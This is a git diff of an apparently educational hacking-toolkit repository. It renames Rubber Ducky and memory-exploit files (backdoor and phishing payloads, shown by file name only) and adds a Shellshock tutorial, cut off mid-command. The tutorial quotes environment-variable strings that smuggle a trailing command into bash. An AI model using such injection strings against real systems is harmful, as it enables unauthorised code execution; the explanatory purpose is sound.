b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/led.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/led.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/led.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/main.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/main.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/main.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/main.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/main.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/main.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/main.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/main.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/udi_msc.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/udi_msc.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/udi_msc.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/udi_msc.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/udi_msc.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/udi_msc.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/udi_msc.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/udi_msc.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/ui.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/ui.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/ui.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/ui.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/ui.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/ui.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/ui.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/ui.h diff --git a/Rubber_Duck/HAK/README.txt b/Other_Hackings/Rubber_Duck/HAK/README.txt similarity index 100% rename from Rubber_Duck/HAK/README.txt rename to Other_Hackings/Rubber_Duck/HAK/README.txt diff --git a/Rubber_Duck/README.md b/Other_Hackings/Rubber_Duck/README.md similarity index 100% rename from Rubber_Duck/README.md rename to Other_Hackings/Rubber_Duck/README.md diff --git a/Rubber_Duck/pwn/README.md b/Other_Hackings/Rubber_Duck/pwn/README.md similarity index 100% rename from Rubber_Duck/pwn/README.md rename to Other_Hackings/Rubber_Duck/pwn/README.md diff --git a/Rubber_Duck/pwn/duckencode.jar b/Other_Hackings/Rubber_Duck/pwn/duckencode.jar similarity index 100% rename from Rubber_Duck/pwn/duckencode.jar rename to Other_Hackings/Rubber_Duck/pwn/duckencode.jar diff --git a/Rubber_Duck/pwn/osx/dns_poisoning.txt b/Other_Hackings/Rubber_Duck/pwn/osx/dns_poisoning.txt similarity index 100% rename from Rubber_Duck/pwn/osx/dns_poisoning.txt rename to Other_Hackings/Rubber_Duck/pwn/osx/dns_poisoning.txt diff --git a/Rubber_Duck/pwn/osx/root_backdoor.txt b/Other_Hackings/Rubber_Duck/pwn/osx/root_backdoor.txt similarity index 100% rename from Rubber_Duck/pwn/osx/root_backdoor.txt rename to Other_Hackings/Rubber_Duck/pwn/osx/root_backdoor.txt diff --git a/Rubber_Duck/pwn/osx/ssh_access.txt b/Other_Hackings/Rubber_Duck/pwn/osx/ssh_access.txt similarity index 100% rename from Rubber_Duck/pwn/osx/ssh_access.txt rename to Other_Hackings/Rubber_Duck/pwn/osx/ssh_access.txt diff --git a/Rubber_Duck/pwn/osx/wget_execute.txt b/Other_Hackings/Rubber_Duck/pwn/osx/wget_execute.txt similarity index 100% rename from Rubber_Duck/pwn/osx/wget_execute.txt rename to Other_Hackings/Rubber_Duck/pwn/osx/wget_execute.txt diff --git a/Rubber_Duck/pwn/windows/create_adm_account.txt b/Other_Hackings/Rubber_Duck/pwn/windows/create_adm_account.txt similarity index 100% rename from Rubber_Duck/pwn/windows/create_adm_account.txt rename to Other_Hackings/Rubber_Duck/pwn/windows/create_adm_account.txt diff --git a/Rubber_Duck/pwn/windows/duck_downloader.txt b/Other_Hackings/Rubber_Duck/pwn/windows/duck_downloader.txt similarity index 100% rename from Rubber_Duck/pwn/windows/duck_downloader.txt rename to Other_Hackings/Rubber_Duck/pwn/windows/duck_downloader.txt diff --git a/Rubber_Duck/pwn/windows/forl_bomb.txt b/Other_Hackings/Rubber_Duck/pwn/windows/forl_bomb.txt similarity index 100% rename from Rubber_Duck/pwn/windows/forl_bomb.txt rename to Other_Hackings/Rubber_Duck/pwn/windows/forl_bomb.txt diff --git a/Rubber_Duck/pwn/windows/hello-world/example1/exploit.txt b/Other_Hackings/Rubber_Duck/pwn/windows/hello-world/example1/exploit.txt similarity index 100% rename from Rubber_Duck/pwn/windows/hello-world/example1/exploit.txt rename to Other_Hackings/Rubber_Duck/pwn/windows/hello-world/example1/exploit.txt diff --git a/Rubber_Duck/pwn/windows/hello-world/example1/inject.bin b/Other_Hackings/Rubber_Duck/pwn/windows/hello-world/example1/inject.bin similarity index 100% rename from Rubber_Duck/pwn/windows/hello-world/example1/inject.bin rename to Other_Hackings/Rubber_Duck/pwn/windows/hello-world/example1/inject.bin diff --git a/Rubber_Duck/pwn/windows/hello-world/example2/exploit.txt b/Other_Hackings/Rubber_Duck/pwn/windows/hello-world/example2/exploit.txt similarity index 100% rename from Rubber_Duck/pwn/windows/hello-world/example2/exploit.txt rename to Other_Hackings/Rubber_Duck/pwn/windows/hello-world/example2/exploit.txt diff --git a/Rubber_Duck/pwn/windows/hello-world/example2/inject.bin b/Other_Hackings/Rubber_Duck/pwn/windows/hello-world/example2/inject.bin similarity index 100% rename from Rubber_Duck/pwn/windows/hello-world/example2/inject.bin rename to Other_Hackings/Rubber_Duck/pwn/windows/hello-world/example2/inject.bin diff --git a/Rubber_Duck/pwn/windows/hide-cmd-window.txt b/Other_Hackings/Rubber_Duck/pwn/windows/hide-cmd-window.txt similarity index 100% rename from Rubber_Duck/pwn/windows/hide-cmd-window.txt rename to Other_Hackings/Rubber_Duck/pwn/windows/hide-cmd-window.txt diff --git a/Rubber_Duck/pwn/windows/lock_your_computer.txt b/Other_Hackings/Rubber_Duck/pwn/windows/lock_your_computer.txt similarity index 100% rename from Rubber_Duck/pwn/windows/lock_your_computer.txt rename to Other_Hackings/Rubber_Duck/pwn/windows/lock_your_computer.txt diff --git a/Rubber_Duck/pwn/windows/phishing.txt b/Other_Hackings/Rubber_Duck/pwn/windows/phishing.txt similarity index 100% rename from Rubber_Duck/pwn/windows/phishing.txt rename to Other_Hackings/Rubber_Duck/pwn/windows/phishing.txt diff --git a/Rubber_Duck/pwn/windows/phishing2.txt b/Other_Hackings/Rubber_Duck/pwn/windows/phishing2.txt similarity index 100% rename from Rubber_Duck/pwn/windows/phishing2.txt rename to Other_Hackings/Rubber_Duck/pwn/windows/phishing2.txt diff --git a/Rubber_Duck/pwn/windows/phishing3_dns_poising.txt b/Other_Hackings/Rubber_Duck/pwn/windows/phishing3_dns_poising.txt similarity index 100% rename from Rubber_Duck/pwn/windows/phishing3_dns_poising.txt rename to Other_Hackings/Rubber_Duck/pwn/windows/phishing3_dns_poising.txt diff --git a/Rubber_Duck/pwn/windows/pineapple_association.txt b/Other_Hackings/Rubber_Duck/pwn/windows/pineapple_association.txt similarity index 100% rename from Rubber_Duck/pwn/windows/pineapple_association.txt rename to Other_Hackings/Rubber_Duck/pwn/windows/pineapple_association.txt diff --git a/Rubber_Duck/pwn/windows/powershell_wget.txt b/Other_Hackings/Rubber_Duck/pwn/windows/powershell_wget.txt similarity index 100% rename from Rubber_Duck/pwn/windows/powershell_wget.txt rename to Other_Hackings/Rubber_Duck/pwn/windows/powershell_wget.txt diff --git a/Rubber_Duck/pwn/windows/run_exe_from_sd.txt b/Other_Hackings/Rubber_Duck/pwn/windows/run_exe_from_sd.txt similarity index 100% rename from Rubber_Duck/pwn/windows/run_exe_from_sd.txt rename to Other_Hackings/Rubber_Duck/pwn/windows/run_exe_from_sd.txt diff --git a/Rubber_Duck/pwn/windows/run_java_from_sd.txt b/Other_Hackings/Rubber_Duck/pwn/windows/run_java_from_sd.txt similarity index 100% rename from Rubber_Duck/pwn/windows/run_java_from_sd.txt rename to Other_Hackings/Rubber_Duck/pwn/windows/run_java_from_sd.txt diff --git a/Rubber_Duck/pwn/windows/wallpaper.txt b/Other_Hackings/Rubber_Duck/pwn/windows/wallpaper.txt similarity index 100% rename from Rubber_Duck/pwn/windows/wallpaper.txt rename to Other_Hackings/Rubber_Duck/pwn/windows/wallpaper.txt diff --git a/Rubber_Duck/pwn/windows/wifi_backdoor.txt b/Other_Hackings/Rubber_Duck/pwn/windows/wifi_backdoor.txt similarity index 100% rename from Rubber_Duck/pwn/windows/wifi_backdoor.txt rename to Other_Hackings/Rubber_Duck/pwn/windows/wifi_backdoor.txt diff --git a/Rubber_Duck/pwn/windows/wifi_firewall.txt b/Other_Hackings/Rubber_Duck/pwn/windows/wifi_firewall.txt similarity index 100% rename from Rubber_Duck/pwn/windows/wifi_firewall.txt rename to Other_Hackings/Rubber_Duck/pwn/windows/wifi_firewall.txt diff --git a/Rubber_Duck/pwn/windows/wifi_firewall2.txt b/Other_Hackings/Rubber_Duck/pwn/windows/wifi_firewall2.txt similarity index 100% rename from Rubber_Duck/pwn/windows/wifi_firewall2.txt rename to Other_Hackings/Rubber_Duck/pwn/windows/wifi_firewall2.txt diff --git a/Pen_Testing_Scripts/.DS_Store b/Pentesting_Scripts/.DS_Store similarity index 100% rename from Pen_Testing_Scripts/.DS_Store rename to Pentesting_Scripts/.DS_Store diff --git a/Pen_Testing_Scripts/README.md b/Pentesting_Scripts/README.md similarity index 100% rename from Pen_Testing_Scripts/README.md rename to Pentesting_Scripts/README.md diff --git a/Pen_Testing_Scripts/networkintrusionpostermed.png b/Pentesting_Scripts/networkintrusionpostermed.png similarity index 100% rename from Pen_Testing_Scripts/networkintrusionpostermed.png rename to Pentesting_Scripts/networkintrusionpostermed.png diff --git a/README.md b/README.md index 63a49b0..f59ee95 100644 --- a/README.md +++ b/README.md @@ -7,24 +7,20 @@ Usage of all tools on this site for attacking targets without prior mutual conse This work is licensed under a [Creative Commons Attribution-ShareAlike 4.0 International License](http://creativecommons.org/licenses/by-sa/4.0/). -* [CTFs and WARGAMES](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/CTFs_and_WarGames) -* [CRYPTOGRAPHY](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Cryptography) -* [FORENSICS](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Forensics) -* [LINUX HACKING](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Linux_Hacking) -* [MEMORY EXPLOITS](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Memory_Exploits) -* [VULNERABILITIES AND EXPLOITS](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Vulnerabilities_and_Exploits) -* [NETWORK and 802.11](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Network_and_802.11) -* [REVERSE ENGINEERING](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Reverse_Engineering) -* [RUBBER DUCK](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Rubber_Duck) -* [STEGANOGRAPHY](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Steganography) -* [WEB EXPLOITS](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Web_Security) -* [OTHER HACKINGS](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Other_Hackings) -* [PEN TESTING](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Pen_Testing) -* [MOBILE](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Mobile) -* [BOTNETS](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Botnets) -* [DDOS](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Ddos) - +* [Cloud and K8s Hacking](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Cloud_security) +* [Cryptography](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Cryptography) +* [CTFs and Wargames](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/CTFs_and_WarGames) +* [Forensics](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Forensics) +* [Linux Hacking](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Linux_Hacking) +* [Mobile Hacking](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Mobile) +* [Network and 802.11](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Network_and_802.11) +* [Other Hackings](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Other_Hackings) +* [Pentesting Scripts](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Pen_Testing) +* [Reverse Engineering](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Reverse_Engineering) +* [Steganography](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Steganography) +* [Vulnerabilities and Exploits](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Vulnerabilities_and_Exploits) +* [Web Hacking](https://github.com/bt3gl/Gray_Hacking_Toolkit/tree/master/Web_Security) ## Articles @@ -48,18 +44,6 @@ This work is licensed under a [Creative Commons Attribution-ShareAlike 4.0 Inter * [Linux/Unix/BSD Post-Exploitation Command List](https://docs.google.com/document/d/1ObQB6hmVvRPCgPTRZM5NMH034VDM-1N-EWPRz2770K4/edit?hl=en_US). -### CI/CD pipelines - -* Static code security analyzers: [SonarQube](https://www.sonarqube.org/) (Javascript scanner), [NodeJsScan](https://github.com/ajinabraham/NodeJsScan). -* Package dependency security analyzers: [Snyk](https://snyk.io/). -* Docker image security analyzers: [Hadolint](https://github.com/hadolint/hadolint), [Clair](https://github.com/coreos/clair), [Anchore](https://anchore.com/). -* AWS IAM permission analyzers: [IAM access advisor APIs](https://aws.amazon.com/blogs/security/automate-analyzing-permissions-using-iam-access-advisor/). -* [PMapper](https://github.com/nccgroup/PMapper). -* AWS S3 permission analyzers: [s3audit](https://github.com/scalefactory/s3audit). -* Docker runtime anomaly detection: [Falco](https://hub.docker.com/r/sysdig/falco). -* Kubernetes policy security analyzers: [RBAC](https://searchsecurity.techtarget.com/definition/role-based-access-control-RBAC). -* Policy auditing tools: [Rakkess](https://github.com/corneliusweig/rakkess). - ### Books diff --git a/Memory_Exploits/Assembly/RUNNING_ASM.sh b/Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/RUNNING_ASM.sh similarity index 100% rename from Memory_Exploits/Assembly/RUNNING_ASM.sh rename to Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/RUNNING_ASM.sh diff --git a/Memory_Exploits/Assembly/asm_compiler.sh b/Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/asm_compiler.sh similarity index 100% rename from Memory_Exploits/Assembly/asm_compiler.sh rename to Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/asm_compiler.sh diff --git a/Memory_Exploits/Assembly/get_shell.asm b/Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/get_shell.asm similarity index 100% rename from Memory_Exploits/Assembly/get_shell.asm rename to Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/get_shell.asm diff --git a/Memory_Exploits/Assembly/netcat_backdoor.asm b/Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/netcat_backdoor.asm similarity index 100% rename from Memory_Exploits/Assembly/netcat_backdoor.asm rename to Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/netcat_backdoor.asm diff --git a/Memory_Exploits/Assembly/shellspawn b/Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/shellspawn similarity index 100% rename from Memory_Exploits/Assembly/shellspawn rename to Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/shellspawn diff --git a/Memory_Exploits/Assembly/shellspawn.asm b/Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/shellspawn.asm similarity index 100% rename from Memory_Exploits/Assembly/shellspawn.asm rename to Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/shellspawn.asm diff --git a/Memory_Exploits/Buffer_overflows/stack_overflow_narnia.md b/Vulnerabilities_and_Exploits/Memory_Exploits/Buffer_overflows/stack_overflow_narnia.md similarity index 100% rename from Memory_Exploits/Buffer_overflows/stack_overflow_narnia.md rename to Vulnerabilities_and_Exploits/Memory_Exploits/Buffer_overflows/stack_overflow_narnia.md diff --git a/Memory_Exploits/C-codes/crawl_passwd_file.c b/Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/crawl_passwd_file.c similarity index 100% rename from Memory_Exploits/C-codes/crawl_passwd_file.c rename to Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/crawl_passwd_file.c diff --git a/Memory_Exploits/C-codes/dos_tool.c b/Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/dos_tool.c similarity index 100% rename from Memory_Exploits/C-codes/dos_tool.c rename to Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/dos_tool.c diff --git a/Memory_Exploits/C-codes/get_stack_pointer.c b/Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/get_stack_pointer.c similarity index 100% rename from Memory_Exploits/C-codes/get_stack_pointer.c rename to Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/get_stack_pointer.c diff --git a/Memory_Exploits/C-codes/getshadd.c b/Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/getshadd.c similarity index 100% rename from Memory_Exploits/C-codes/getshadd.c rename to Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/getshadd.c diff --git a/Memory_Exploits/C-codes/http_backdoor.c b/Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/http_backdoor.c similarity index 100% rename from Memory_Exploits/C-codes/http_backdoor.c rename to Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/http_backdoor.c diff --git a/Memory_Exploits/C-codes/leave_no_log.c b/Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/leave_no_log.c similarity index 100% rename from Memory_Exploits/C-codes/leave_no_log.c rename to Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/leave_no_log.c diff --git a/Memory_Exploits/C-codes/md5_xor.c b/Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/md5_xor.c similarity index 100% rename from Memory_Exploits/C-codes/md5_xor.c rename to Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/md5_xor.c diff --git a/Memory_Exploits/C-codes/shellcode_encode.c b/Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/shellcode_encode.c similarity index 100% rename from Memory_Exploits/C-codes/shellcode_encode.c rename to Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/shellcode_encode.c diff --git a/Memory_Exploits/C-codes/stack_overflow_generator.c b/Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/stack_overflow_generator.c similarity index 100% rename from Memory_Exploits/C-codes/stack_overflow_generator.c rename to Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/stack_overflow_generator.c diff --git a/Memory_Exploits/C-codes/strobe.c b/Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/strobe.c similarity index 100% rename from Memory_Exploits/C-codes/strobe.c rename to Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/strobe.c diff --git a/Memory_Exploits/C-codes/testing_shellcode.c b/Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/testing_shellcode.c similarity index 100% rename from Memory_Exploits/C-codes/testing_shellcode.c rename to Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/testing_shellcode.c diff --git a/Memory_Exploits/C-codes/testing_shellcode2.c b/Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/testing_shellcode2.c similarity index 100% rename from Memory_Exploits/C-codes/testing_shellcode2.c rename to Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/testing_shellcode2.c diff --git a/Memory_Exploits/C-codes/testing_shellcode3.c b/Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/testing_shellcode3.c similarity index 100% rename from Memory_Exploits/C-codes/testing_shellcode3.c rename to Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/testing_shellcode3.c diff --git a/Memory_Exploits/C-codes/testing_shellcode4.c b/Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/testing_shellcode4.c similarity index 100% rename from Memory_Exploits/C-codes/testing_shellcode4.c rename to Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/testing_shellcode4.c diff --git a/Memory_Exploits/Integer_Overflows/integer_overflows.md b/Vulnerabilities_and_Exploits/Memory_Exploits/Integer_Overflows/integer_overflows.md similarity index 100% rename from Memory_Exploits/Integer_Overflows/integer_overflows.md rename to Vulnerabilities_and_Exploits/Memory_Exploits/Integer_Overflows/integer_overflows.md diff --git a/Memory_Exploits/README.md b/Vulnerabilities_and_Exploits/Memory_Exploits/README.md similarity index 100% rename from Memory_Exploits/README.md rename to Vulnerabilities_and_Exploits/Memory_Exploits/README.md diff --git a/Memory_Exploits/bash/find_setuid_programs.sh b/Vulnerabilities_and_Exploits/Memory_Exploits/bash/find_setuid_programs.sh similarity index 100% rename from Memory_Exploits/bash/find_setuid_programs.sh rename to Vulnerabilities_and_Exploits/Memory_Exploits/bash/find_setuid_programs.sh diff --git a/Memory_Exploits/bash/get_shellcode_form_an_exe.sh b/Vulnerabilities_and_Exploits/Memory_Exploits/bash/get_shellcode_form_an_exe.sh similarity index 100% rename from Memory_Exploits/bash/get_shellcode_form_an_exe.sh rename to Vulnerabilities_and_Exploits/Memory_Exploits/bash/get_shellcode_form_an_exe.sh diff --git a/Memory_Exploits/python-codes/eggdis.py b/Vulnerabilities_and_Exploits/Memory_Exploits/python-codes/eggdis.py similarity index 100% rename from Memory_Exploits/python-codes/eggdis.py rename to Vulnerabilities_and_Exploits/Memory_Exploits/python-codes/eggdis.py diff --git a/Vulnerabilities_and_Exploits/shellshock.md b/Vulnerabilities_and_Exploits/shellshock.md new file mode 100644 index 0000000..a75a082 --- /dev/null +++ b/Vulnerabilities_and_Exploits/shellshock.md @@ -0,0 +1,421 @@ +# Understanding the Shellshock Vulnerability + + +Almost a week ago, a new ([old]) type of [OS command Injection] was reported. The **Shellshock** vulnerability, also known as **[CVE-2014-6271]**, allows attackers to inject their own code into [Bash] using specially crafted **environment variables**, and it was disclosed with the following description: + + Bash supports exporting not just shell variables, but also shell functions to other bash instances, via the process environment to(indirect) child processes. Current bash versions use an environment variable named by the function name, and a function definition starting with “() {” in the variable value to propagate function definitions through the environment. The vulnerability occurs because bash does not stop after processing the function definition; it continues to parse and execute shell commands following the function definition. + + For example, an environment variable setting of + VAR=() { ignored; }; /bin/id + will execute /bin/id when the environment is imported into the bash process. (The process is in a slightly undefined state at this point. The PATH variable may not have been set up yet, and bash could crash after executing /bin/id, but the damage has already happened at this point.) + + The fact that an environment variable with an arbitrary name can be used as a carrier for a malicious function definition containing trailing commands makes this vulnerability particularly severe; it enables network-based exploitation. + + + + + +Even scarier, the [NIST vulnerability database] has rated [this vulnerability “10 out of 10” in terms of severity]. At this point, there are claims that the [Shellshock attacks could already top 1 Billion]. [Shellshock-targeting DDoS attacks and IRC bots were spotted less than 24 hours after news about Shellshock went public last week!] [Honeypots are catching several exploit payloads]. Matthew Prince, from [Cloudflare], said yesterday that they are "[seeing north of 1.5 million Shellshock attacks across the CloudFlare network daily]". In the same day, the [Incapsula] team released several plots showing that their application firewall had deflected over 217,089 exploit attempts on over 4,115 domains although almost 70% were scanners (to attempt to verify the vulnerability), almost 35% where either payload to try to hijack the server or [DDoS] malware. + +[Incapsula]:http://www.incapsula.com/blog/shellshock-bash-vulnerability-aftermath.html, +[DDoS]: http://en.wikipedia.org/wiki/Denial-of-service_attack + + + + +[Shellshock-targeting DDoS attacks and IRC bots were spotted less than 24 hours after news about Shellshock went public last week!]: http://www.inforisktoday.co.uk/attackers-exploit-shellshock-bug-a-7361 +[seeing north of 1.5 million Shellshock attacks across the CloudFlare network daily]: https://twitter.com/eastdakota/status/516457250332741632 +[Cloudflare]: https://www.cloudflare.com/ +[CVE-2014-6271]: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271 +[old]: http://blog.erratasec.com/2014/09/shellshock-is-20-years-old-get-off-my.html +[OS command Injection]: http://cwe.mitre.org/data/definitions/78.html +[CWE (Common Weakness Enumeration)]: http://cwe.mitre.org/index.html +[Bash]: http://www.gnu.org/software/bash/ +[NIST vulnerability database]: http://nvd.nist.gov/ +[this vulnerability “10 out of 10” in terms of severity]: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271 +[Honeypots are catching several exploit payloads]: http://www.alienvault.com/open-threat-exchange/blog/attackers-exploiting-shell-shock-cve-2014-6721-in-the-wild +[Shellshock attacks could already top 1 Billion]: http://www.securityweek.com/shellshock-attacks-could-already-top-1-billion-report?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Securityweek+%28SecurityWeek+RSS+Feed%29 + + + + +------------------------------ +## Understanding the Bash Shell + + +To understand this vulnerability, we need to know how Bash handles functions and environment variables. + +The [GNU Bourne Again shell (BASH)] is a [Unix shell] and [command language interpreter]. It was released in 1989 by [Brian Fox] for the [GNU Project] as a free software replacement for the [Bourne shell] (which was born back in 1977). + +```sh +$ man bash +NAME + bash - GNU Bourne-Again SHell +SYNOPSIS + bash [options] [file] +COPYRIGHT + Bash is Copyright (C) 1989-2011 by the Free Software Foundation, Inc. +DESCRIPTION + Bash is a sh-compatible command language interpreter that executes commands read from the standard input or from a file. Bash also incorporates useful features from the Korn and C shells (ksh and csh). +(...) +``` + + Of course, there are [other command shells out there]. However, Bash is the default shell for most of the Linux systems (and Linux-based systems), including many Debian-based distributions and the Red Hat & Fedora & CentOS combo. + + +### Functions in Bash + +The interesting stuff comes from the fact that Bash is also a scripting language, with the ability to define functions. This is super useful when you are writing scripts. For example, ```hello.sh```: +```sh +#!/bin/bash +function hello { + echo Hello! +} +hello +``` +which can be called as: +```sh +$ chmod a+x hello.sh +$ ./hello.sh +Hello! +``` + +A function may be compacted into a single line. You just need to choose a name and put a ```()``` after it. Everything inside ```{}``` will belong to the scope of your function. + +For example, we can create a function ```bashiscool``` that uses ```echo``` to display message on the standard output: + +```sh +$ bashiscool() { echo "Bash is actually Fun"; } +$ bashiscool +Bash is actually Fun +``` + + +### Child Processes and the ```export``` command + +We can make things even more interesting. The statement ```bash -c ``` can be used to execute a new instance of Bash, as a subprocess, to run new commands (```-c``` passes a string with a command). The catch is that the child process does not inherit the functions or variables that we defined in the parent: +```sh +$ bash -c bashiscool # spawn nested shell +bash: bashiscool: command not found +``` + + +So before executing a new instance of Bash, we need to export the **environment variables** to the child. That's why we need the ```export``` command. In the example below, the flag ```-f``` means *read key bindings from filename*: +```sh +$ export -f bashiscool +$ bash -c bashiscool # spawn nested shell +Bash is actually Fun +``` + + + +In other words, first, the ```export``` command creates a **regular environment variable** containing the function definition. Then, the second shell reads the environment. If it sees a variable that looks like a function, it evaluates this function! + + +### A Simple Example of an Environment Variable + + +Let's see how environment variables work examining some *builtin* Bash command. For instance, a very popular one, ```grep```, is used to search for pattern in files (or the standard input). + +Running ```grep``` in a file that contains the word 'fun' will return the line where this word is. Running ```grep``` with a flag ```-v``` will return the non-matching lines, *i.e.,* the lines where the word 'fun' does not appear: +```sh +$ echo 'bash can be super fun' > file.txt +$ echo 'bash can be dangerous' >> file.txt +$ cat file.txt + bash can be super fun + bash can be dangerous +$ grep fun file.txt + bash can be super fun +$ grep -v fun file.txt + bash can be dangerous +``` + +The ```grep``` command uses an environment variable called **GREP_OPTIONS** to set default options. This variable is usually set to: +```sh +$ echo $GREP_OPTIONS +--color=auto +``` + + To update or create a new environment variable, it is not enough to use the Bash syntax ```GREP_OPTIONS='-v'```, but instead we need to call the *builtin* ```export```: + +```sh +$ GREP_OPTIONS='-v' +$ grep fun file.txt + bash can be super fun +$ export GREP_OPTIONS='-v' +$ grep fun file.txt + bash can be dangerous +``` + +### The ```env``` command + +Another Bash *builtin*, the ```env``` prints the environment variables. But it can also be used to run a single command with an exported variable (or variables) given to that command. In this case, ```env``` starts a new process, then it modifies the environment, and then it calls the command that was provided as an argument (the ```env``` process is replaced by the command process). + +In practice, to use ```env``` to run commands, we: + + 1. set the environment variable value with env, + 2. spawn a new shell using bash -c, + 3. pass the command/function we want to run (for example, grep fun file.txt). + +For example: +```sh +$ env GREP_OPTIONS='-v' | grep fun file.txt # this does not work, we need another shell +bash can be super fun +$ env GREP_OPTIONS='-v' bash -c 'grep fun file.txt' # here we go +bash can be dangerous + +``` + +### Facing the Shellshock Vulnerability + + + +What if we pass some function to the variable definition? +```sh +$ env GREP_OPTIONS='() { :;};' bash -c 'grep fun file.txt' +grep: {: No such file or directory +grep: :;};: No such file or directory +grep: fun: No such file or directory +``` +Since the things we added are strange when parsed to the command ```grep```, it won't understand them. + +What if we add stuff *after* the function? Things start to get weirder: +```sh +$ env GREP_OPTIONS='-v () { :;}; echo 